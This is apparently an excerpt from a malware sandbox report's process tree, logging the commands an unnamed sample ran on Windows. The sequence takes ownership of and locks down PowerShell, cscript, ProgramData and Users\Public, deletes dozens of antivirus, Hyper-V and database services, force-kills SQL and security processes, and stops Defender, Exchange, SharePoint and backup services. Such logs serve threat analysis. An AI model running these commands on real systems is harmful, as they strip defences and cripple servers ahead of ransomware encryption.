C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
3⤵
PID:3112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
3⤵
PID:880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4784

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
3⤵
PID:236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
3⤵
PID:1528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2824

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
3⤵
PID:3408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2200

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
3⤵
PID:1920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2320

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d system
3⤵
PID:4808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4912

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:372

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:4352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3168

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:796

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:4872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4988

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:4676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:4660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1388

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:3100

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:3112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1824

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1844

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:4564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:4372

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:3612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5100

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\ProgramData /a
3⤵
- Modifies file permissions
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:328

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /g Administrators:f
3⤵
PID:5016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1372

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Users:r
3⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5112

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Administrators:r
3⤵
PID:4616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4084

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d SERVICE
3⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4724

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssqlserver
3⤵
PID:3096

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d "network service"
3⤵
PID:612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4652

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d system
3⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3124

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssql$sqlexpress
3⤵
PID:836

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Users\Public /a
3⤵
- Modifies file permissions
PID:2116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /g Administrators:f
3⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Users:r
3⤵
PID:2804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:68

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Administrators:r
3⤵
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4848

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d SERVICE
3⤵
PID:3892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4932

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssqlserver
3⤵
PID:4612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3600

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d "network service"
3⤵
PID:4840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d system
3⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4152

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssql$sqlexpress
3⤵
PID:4892

C:\Windows\SysWOW64\sc.exe
sc delete "vmickvpexchange"
3⤵
- Launches sc.exe
PID:2868

C:\Windows\SysWOW64\sc.exe
sc delete "vmicguestinterface"
3⤵
- Launches sc.exe
PID:328

C:\Windows\SysWOW64\sc.exe
sc delete "vmicshutdown"
3⤵
PID:2224

C:\Windows\SysWOW64\sc.exe
sc delete "vmicheartbeat"
3⤵
PID:4228

C:\Windows\SysWOW64\sc.exe
sc delete "vmicrdv"
3⤵
- Launches sc.exe
PID:4956

C:\Windows\SysWOW64\sc.exe
sc delete "storflt"
3⤵
PID:4944

C:\Windows\SysWOW64\sc.exe
sc delete "vmictimesync"
3⤵
PID:3716

C:\Windows\SysWOW64\sc.exe
sc delete "vmicvss"
3⤵
PID:676

C:\Windows\SysWOW64\sc.exe
sc delete "hvdsvc"
3⤵
PID:3076

C:\Windows\SysWOW64\sc.exe
sc delete "nvspwmi"
3⤵
PID:4760

C:\Windows\SysWOW64\sc.exe
sc delete "wmms"
3⤵
- Launches sc.exe
PID:4448

C:\Windows\SysWOW64\sc.exe
sc delete "AvgAdminServer"
3⤵
PID:1532

C:\Windows\SysWOW64\sc.exe
sc delete "AVG Antivirus"
3⤵
- Launches sc.exe
PID:4500

C:\Windows\SysWOW64\sc.exe
sc delete "avgAdminClient"
3⤵
PID:160

C:\Windows\SysWOW64\sc.exe
sc delete "SAVService"
3⤵
PID:4740

C:\Windows\SysWOW64\sc.exe
sc delete "SAVAdminService"
3⤵
- Launches sc.exe
PID:1524

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos AutoUpdate Service"
3⤵
PID:844

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Clean Service"
3⤵
- Launches sc.exe
PID:976

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Device Control Service"
3⤵
- Launches sc.exe
PID:4664

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
PID:2592

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos File Scanner Service"
3⤵
PID:4508

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Health Service"
3⤵
PID:2024

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Agent"
3⤵
PID:1956

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Client"
3⤵
PID:4920

C:\Windows\SysWOW64\sc.exe
sc delete "SntpService"
3⤵
- Launches sc.exe
PID:1008

C:\Windows\SysWOW64\sc.exe
sc delete "swc_service"
3⤵
- Launches sc.exe
PID:4912

C:\Windows\SysWOW64\sc.exe
sc delete "swi_service"
3⤵
PID:372

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos UI"
3⤵
PID:3000

C:\Windows\SysWOW64\sc.exe
sc delete "swi_update"
3⤵
PID:1536

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Web Control Service"
3⤵
- Launches sc.exe
PID:1100

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos System Protection Service"
3⤵
PID:4176

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Safestore Service"
3⤵
PID:3312

C:\Windows\SysWOW64\sc.exe
sc delete "hmpalertsvc"
3⤵
- Launches sc.exe
PID:4860

C:\Windows\SysWOW64\sc.exe
sc delete "RpcEptMapper"
3⤵
PID:4704

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
PID:5000

C:\Windows\SysWOW64\sc.exe
sc delete "SophosFIM"
3⤵
PID:4700

C:\Windows\SysWOW64\sc.exe
sc delete "swi_filter"
3⤵
PID:1984

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdGuardianDefaultInstance"
3⤵
PID:4220

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdServerDefaultInstance"
3⤵
- Launches sc.exe
PID:2028

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
3⤵
PID:2604

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLSERVER"
3⤵
PID:4260

C:\Windows\SysWOW64\sc.exe
sc delete "SQLSERVERAGENT"
3⤵
PID:4788

C:\Windows\SysWOW64\sc.exe
sc delete "SQLBrowser"
3⤵
PID:1120

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY"
3⤵
- Launches sc.exe
PID:4080

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer130"
3⤵
PID:1408

C:\Windows\SysWOW64\sc.exe
sc delete "SSISTELEMETRY130"
3⤵
PID:2120

C:\Windows\SysWOW64\sc.exe
sc delete "SQLWriter"
3⤵
- Launches sc.exe
PID:324

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:1848

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$VEEAMSQL2012"
3⤵
PID:2736

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL"
3⤵
PID:2792

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent"
3⤵
PID:2504

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerADHelper100"
3⤵
PID:2560

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerOLAPService"
3⤵
PID:4820

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer100"
3⤵
PID:4904

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer"
3⤵
- Launches sc.exe
PID:2400

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY$HL"
3⤵
PID:1964

C:\Windows\SysWOW64\sc.exe
sc delete "TMBMServer"
3⤵
- Launches sc.exe
PID:4844

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$PROGID"
3⤵
PID:300

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$WOLTERSKLUWER"
3⤵
- Launches sc.exe
PID:3612

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$PROGID"
3⤵
PID:4272

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
- Launches sc.exe
PID:224

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
PID:4352

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$OPTIMA"
3⤵
PID:4892

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$OPTIMA"
3⤵
PID:2868

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer$OPTIMA"
3⤵
PID:796

C:\Windows\SysWOW64\sc.exe
sc delete "msftesql$SQLEXPRESS"
3⤵
PID:2224

C:\Windows\SysWOW64\sc.exe
sc delete "postgresql-x64-9.4"
3⤵
- Launches sc.exe
PID:4228

C:\Windows\SysWOW64\sc.exe
sc delete "WRSVC"
3⤵
PID:4956

C:\Windows\SysWOW64\sc.exe
sc delete "ekrn"
3⤵
- Launches sc.exe
PID:4680

C:\Windows\SysWOW64\sc.exe
sc delete "ekrnEpsw"
3⤵
- Launches sc.exe
PID:3716

C:\Windows\SysWOW64\sc.exe
sc delete "klim6"
3⤵
- Launches sc.exe
PID:3088

C:\Windows\SysWOW64\sc.exe
sc delete "AVP18.0.0"
3⤵
- Launches sc.exe
PID:4728

C:\Windows\SysWOW64\sc.exe
sc delete "KLIF"
3⤵
PID:1832

C:\Windows\SysWOW64\sc.exe
sc delete "klpd"
3⤵
PID:3192

C:\Windows\SysWOW64\sc.exe
sc delete "klflt"
3⤵
- Launches sc.exe
PID:2208

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupdisk"
3⤵
PID:4552

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupflt"
3⤵
PID:4548

C:\Windows\SysWOW64\sc.exe
sc delete "klkbdflt"
3⤵
PID:1168

C:\Windows\SysWOW64\sc.exe
sc delete "klmouflt"
3⤵
PID:1852

C:\Windows\SysWOW64\sc.exe
sc delete "klhk"
3⤵
- Launches sc.exe
PID:2044

C:\Windows\SysWOW64\sc.exe
sc delete "KSDE1.0.0"
3⤵
- Launches sc.exe
PID:2256

C:\Windows\SysWOW64\sc.exe
sc delete "kltap"
3⤵
- Launches sc.exe
PID:2552

C:\Windows\SysWOW64\sc.exe
sc delete "ScSecSvc"
3⤵
- Launches sc.exe
PID:228

C:\Windows\SysWOW64\sc.exe
sc delete "Core Mail Protection"
3⤵
- Launches sc.exe
PID:3032

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning Server"
3⤵
PID:4952

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning ServerEx"
3⤵
PID:3408

C:\Windows\SysWOW64\sc.exe
sc delete "Online Protection System"
3⤵
PID:3452

C:\Windows\SysWOW64\sc.exe
sc delete "RepairService"
3⤵
PID:3704

C:\Windows\SysWOW64\sc.exe
sc delete "Core Browsing Protection"
3⤵
PID:4612

C:\Windows\SysWOW64\sc.exe
sc delete "Quick Update Service"
3⤵
PID:32

C:\Windows\SysWOW64\sc.exe
sc delete "McAfeeFramework"
3⤵
- Launches sc.exe
PID:280

C:\Windows\SysWOW64\sc.exe
sc delete "macmnsvc"
3⤵
- Launches sc.exe
PID:696

C:\Windows\SysWOW64\sc.exe
sc delete "masvc"
3⤵
PID:4124

C:\Windows\SysWOW64\sc.exe
sc delete "mfemms"
3⤵
- Launches sc.exe
PID:4972

C:\Windows\SysWOW64\sc.exe
sc delete "mfevtp"
3⤵
PID:2220

C:\Windows\SysWOW64\sc.exe
sc delete "TmFilter"
3⤵
- Launches sc.exe
PID:3240

C:\Windows\SysWOW64\sc.exe
sc delete "TMLWCSService"
3⤵
PID:5084

C:\Windows\SysWOW64\sc.exe
sc delete "tmusa"
3⤵
PID:4688

C:\Windows\SysWOW64\sc.exe
sc delete "TmPreFilter"
3⤵
- Launches sc.exe
PID:5068

C:\Windows\SysWOW64\sc.exe
sc delete "TMSmartRelayService"
3⤵
PID:4640

C:\Windows\SysWOW64\sc.exe
sc delete "TMiCRCScanService"
3⤵
PID:396

C:\Windows\SysWOW64\sc.exe
sc delete "VSApiNt"
3⤵
PID:3900

C:\Windows\SysWOW64\sc.exe
sc delete "TmCCSF"
3⤵
- Launches sc.exe
PID:676

C:\Windows\SysWOW64\sc.exe
sc delete "tmlisten"
3⤵
PID:3096

C:\Windows\SysWOW64\sc.exe
sc delete "TmProxy"
3⤵
PID:4936

C:\Windows\SysWOW64\sc.exe
sc delete "ntrtscan"
3⤵
- Launches sc.exe
PID:4448

C:\Windows\SysWOW64\sc.exe
sc delete "ofcservice"
3⤵
PID:216

C:\Windows\SysWOW64\sc.exe
sc delete "TmPfw"
3⤵
PID:1516

C:\Windows\SysWOW64\sc.exe
sc delete "PccNTUpd"
3⤵
- Launches sc.exe
PID:220

C:\Windows\SysWOW64\sc.exe
sc delete "PandaAetherAgent"
3⤵
PID:1316

C:\Windows\SysWOW64\sc.exe
sc delete "PSUAService"
3⤵
PID:4776

C:\Windows\SysWOW64\sc.exe
sc delete "NanoServiceMain"
3⤵
PID:2304

C:\Windows\SysWOW64\sc.exe
sc delete "EPIntegrationService"
3⤵
PID:2808

C:\Windows\SysWOW64\sc.exe
sc delete "EPProtectedService"
3⤵
PID:4024

C:\Windows\SysWOW64\sc.exe
sc delete "EPRedline"
3⤵
- Launches sc.exe
PID:236

C:\Windows\SysWOW64\sc.exe
sc delete "EPSecurityService"
3⤵
PID:2824

C:\Windows\SysWOW64\sc.exe
sc delete "EPUpdateService"
3⤵
PID:1312

C:\Windows\SysWOW64\sc.exe
sc delete "UniFi"
3⤵
PID:2200

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im PccNTMon.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im NTRtScan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmListen.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmCCSF.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmProxy.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmPfw.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im CNTAoSMgr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msmdsrv.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlceip.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im Ssms.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im SQLAGENT.EXE
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdhost.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im ReportingServicesService.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im pg_ctl.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im postgres.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:2152

C:\Windows\SysWOW64\net.exe
net stop MSSQL$ISARS
3⤵
PID:3256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
4⤵
PID:4552

C:\Windows\SysWOW64\net.exe
net stop MSSQL$MSFW
3⤵
PID:2836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
4⤵
PID:2792

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ISARS
3⤵
PID:4492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
4⤵
PID:2256

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$MSFW
3⤵
PID:4780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
4⤵
PID:4068

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:3904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:1536

C:\Windows\SysWOW64\net.exe
net stop ReportServer$ISARS
3⤵
PID:1260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$ISARS
4⤵
PID:2868

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:2996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:3120

C:\Windows\SysWOW64\net.exe
net stop WinDefend
3⤵
PID:3252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinDefend
4⤵
PID:3900

C:\Windows\SysWOW64\net.exe
net stop mr2kserv
3⤵
PID:3280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mr2kserv
4⤵
PID:1840

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
3⤵
PID:3100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
4⤵
PID:2768

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFBA
3⤵
PID:2216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFBA
4⤵
PID:2416

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
3⤵
PID:1448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
4⤵
PID:4644

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA
3⤵
PID:276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA
4⤵
PID:1416

C:\Windows\SysWOW64\net.exe
net stop ShadowProtectSvc
3⤵
PID:712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShadowProtectSvc
4⤵
PID:3448

C:\Windows\SysWOW64\net.exe
net stop SPAdminV4
3⤵
PID:228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPAdminV4
4⤵
PID:3032

C:\Windows\SysWOW64\net.exe
net stop SPTimerV4
3⤵
PID:4924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTimerV4
4⤵
PID:4432

C:\Windows\SysWOW64\net.exe
net stop SPTraceV4
3⤵
PID:4424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTraceV4
4⤵
PID:5016

C:\Windows\SysWOW64\net.exe
net stop SPUserCodeV4
3⤵
PID:696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPUserCodeV4
4⤵
PID:5076

C:\Windows\SysWOW64\net.exe
net stop SPWriterV4
3⤵
